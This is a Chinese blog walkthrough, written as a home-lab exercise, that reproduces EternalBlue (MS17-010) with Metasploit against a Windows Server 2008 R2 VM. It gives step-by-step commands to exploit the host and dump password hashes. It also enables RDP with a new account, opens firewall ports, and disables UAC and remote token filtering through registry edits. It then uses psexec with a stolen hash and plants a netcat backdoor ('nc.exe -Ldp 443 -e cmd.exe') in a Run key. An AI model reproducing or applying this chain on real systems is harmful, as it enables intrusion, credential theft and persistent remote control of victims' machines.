目录

1.安装靶机和攻击机

2.永恒之蓝复现

3.永恒之蓝利用之远程桌面登录。

4.远程桌面登录遇到问题

4.1密码策略

4.2支不支持远程桌面

5.关闭主机防护策略并开启后门

5.1查看用户、密码

5.2创建防火墙规则

5.3关闭UAC

5.4开启默认共享

5.5使用 use exploit/windows/smb/psexec

5.5.1psexec简单了解

5.5.2使用具体步骤

6.上传后门

6.1上次后门程序

6.2设置键值


1.安装靶机和攻击机

首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win server 2008  R2 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址:Get Kali | Kali Linux  在虚拟机里面直接选择打开就可以了。

攻击机 kali ip是192.168.3.138

靶机 win server 2008  R2  ip是192.168.3.147

2.永恒之蓝复现

1.首先知道你靶机和攻击机的IP地址

2.可以kali里面 用nmap扫描靶机开了那些端口,可以看到开了135,445,4915这些端口开放。这个命令会扫一下常用的端口是否开放哦

3.输入msfdb run 进入msf中,这利每次都会出现不一样的图案,感觉有种小惊喜。这次是一个鸭子。

4.开始搜索ms17_010  命令 search ms17_010

5.先使用aux模块扫描靶机有无漏洞  步骤如下

第一步 使用扫描模块 use auxiliary/scanner/smb/smb_ms17_010

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147

第四步 运行 run

如果看到Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)表示该靶机很容易受到ms17-010的攻击

6.开始利用exploit模块进行攻击了。

第一步 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147,

不需要设置payloads 因为我的kali自动就有设置好了,主要设置是攻击机的IP地址和端口,因为要建立会话,没有对象怎么谈恋爱呢。如果需要改动自己再设置。(怕有的人不会设置补充一下,set payload windows/x64/meterpreter/reverse_tcp.后面你跟你要使用的payload就可以了,可以通过shows payload查看所以payload)

第四步 运行 run

7.看到这个就是攻击成功了。建立了一个会话。

3.永恒之蓝利用之远程桌面登录。

在计算机—属性—高级系统设置—远程里面可以看到默认是不允许远程链接的,我们可以通过命令让靶机允许远程链接


启动目标主机的3389端口即远程桌面协议,执行远程链接命令

run post/windows/manage/enable_rdp

回头打开靶机的系统属性,就会发现已经运行远程连接了。

如果你再扫描端口发现3389端口已经打开了

接下来就是远程登录,登录需要账号密码的,我们可以利用命令自己创建一个

run post/windows/manage/enable_rdp USERNAME=thy PASSWORD=1

现在就可以远程桌面登录了,rdesktop 192.168.3.147,输入账号,密码登录进来。

4.远程桌面登录遇到问题

4.1密码策略

这个是我在进行操作的时候遇到的问题,首先第一个就是在创建用户的时候始终失败,后来我直接在我靶机创建用户也是失败提示什么密码复杂性,密码策略,你需要将密码复杂性禁用步骤如下

输入gpedit.msc-windows设置-安全设置-账户策略-密码策略-禁用密码复杂性。

4.2支不支持远程桌面

第二个就是你要看你的靶机支不支持远程桌面链接,我百度得到的消息是windows家庭普通版式不支持的。在计算机属性里可以看到,或者你打开远程的时候只要我上半部分页面,没有下半部分三个选择,就代表你那个不行。

5.关闭主机防护策略并开启后门

5.1查看用户、密码

使用hashdump 可以查看用户和密码,等会我们需要设置账户和密码

5.2创建防火墙规则

因为防火墙是开启的,所以创建一条防火墙规则允许4444端口访问网络,方便后期操作

shell就可以进入cmd命令操作

netsh firewall add portopening TCP 4444 "thy" ENABLE ALL

5.3关闭UAC

其原理就是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,已达到帮助阻止恶意程序损坏系统的效果。

 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

ADD 添加一个注册表项

-v 创建键值

-t 键值类型

-d 键值的值

-f 强制修改注册表项

5.4开启默认共享

开启系统主机的默认共享,默认共享对于主机文件共享非常方便,也方便黑客利用这个功能,远程执行命令。

 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

多次输入exit 直到回到meterpreter ,输入backgroup 将刚刚永恒之蓝拿到的会话保持到后台。

5.5使用 use exploit/windows/smb/psexec

5.5.1psexec简单了解

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口,只需要对方开启admin$共享(该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是windows提供的工具,所以杀毒软件会将其添加到白名单中。

psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。

在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志,所以会在攻击溯源时通过日志反推攻击流程。

psexec使用前提:

  • 对方主机开启了 admin$ 共享,如果关闭了admin$共享,会提示:找不到网络名

  • 如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败: 未授予用户在此计算机上的请求登录类型。

  • 如果是域环境,连接普通域主机可以用普通域用户,连接域控需要域管理员。

5.5.2使用具体步骤

第一步 使用扫描模块 use exploit/windows/smb/psexec

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147

第四步 设置靶机账户名 set smbuser thy

第五步 设置靶机密码 set smbpass (hash值)

第六步 设置靶机工作组 set smbdomain (工作组,在计算机属性里面能看到)

第四步 运行 run

6.上传后门

6.1上传后门程序

为了让连接持久话,我们可以上传后门程序,这样就能保持会话长久建立。在kali 里面如下路径有我们的后门程序nc 俗称瑞士军刀。我们可以将它上传到目标机c盘里面

上传nc到c盘windows文件夹中,如果想更隐蔽一点,可以在往文件夹里面上传

打开靶机window文件夹可以看到成功上传文件。

6.2设置键值

当目标机开机,程序后台运行,且监听端口为443,这个端口可以自己设置。

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

如果你的防火墙没有配置该端口需要你新建一个防火墙规则,允许443端口访问网络。可以通过reboot命令重起目标机,然后通过nc -v 192.168.3.147 443连接。

netsh firewall add portopening TCP 443 "thy" ENABLE ALL

以上是我自己的攻击练习,记录一下,继续加油。

下一篇:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的博客-CSDN博客

永恒之蓝漏洞复现及上传后门程序相关推荐

  1. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  2. 永恒之蓝漏洞复现(ms17-010)

    文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...

  3. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  4. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  5. 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现

    文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...

  6. MS17_010永恒之蓝漏洞复现

    MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...

  7. metasploit中msfconsole使用教程,永恒之蓝漏洞复现

    文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...

  8. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  9. 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64 提示:  复现攻击前请关闭杀毒软件 1.复现第一步按以下操作打开 445端口: 在 "运行" 里输 ...

  10. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

最新文章

  1. mysql 平均日营业额_一条SQL语句中算日销售额和月销售额
  2. 【NLP-语义匹配】详解深度语义匹配模型DSSM
  3. mysql springboot 缓存_Spring Boot 整合 Redis 实现缓存操作
  4. filterreader_Java FilterReader markSupported()方法与示例
  5. 最优化学习笔记(十五)——拟牛顿法(1)
  6. android webview的一些设置问题
  7. MySQL数据库中的删除命令:delete、truncate、drop
  8. android获取wifi支持的信道,Android获取当前联接wifi的信道
  9. linux敏感内容检测工具,认识Linux平台四大IDS***检测工具
  10. 80端口为什么要备案_搞网站的你,不了解一下共享虚拟主机和备案问题
  11. 区块链开发用什么语言好?
  12. 地震了,地震了!!!
  13. 【报告分享】 知乎:2020「知+」产品手册(附下载)
  14. 怎样在tableau里做渐变柱状图
  15. 多云时代,IBM云计算有什么不同?
  16. MFC编程实例二:进度条的使用
  17. 2021年春季PAT甲级考试
  18. Android Facebook登录,进来看就对了
  19. 明星2,3亿年收入,其实也合情合理
  20. Android之无限轮播图源代码

热门文章

  1. 通过IMAP方式迁移U-Mail邮件到Exchange 2013之2008R2 AD搭建!
  2. Java岗大厂面试百日冲刺 - 日积月累,每日三题【Day17】—— 数据库4
  3. 编译MKL50.1 (for 一加手机)
  4. 浅析显卡市场的未来走向:现在可以抄底了吗?
  5. 出家12年,北大数学天才柳智宇下山还俗:从事心理咨询,主动要求降薪至2万
  6. 编译jitsi-meet安卓遇到的问题
  7. java base64 加号_Base64 空格,加号问题
  8. python打砖块游戏算法设计分析_Python打砖块
  9. SDUT - 表达式语法分析——递归子程序法
  10. 2015-2016 Petrozavodsk Winter Training Camp, Moscow SU Trinity Contest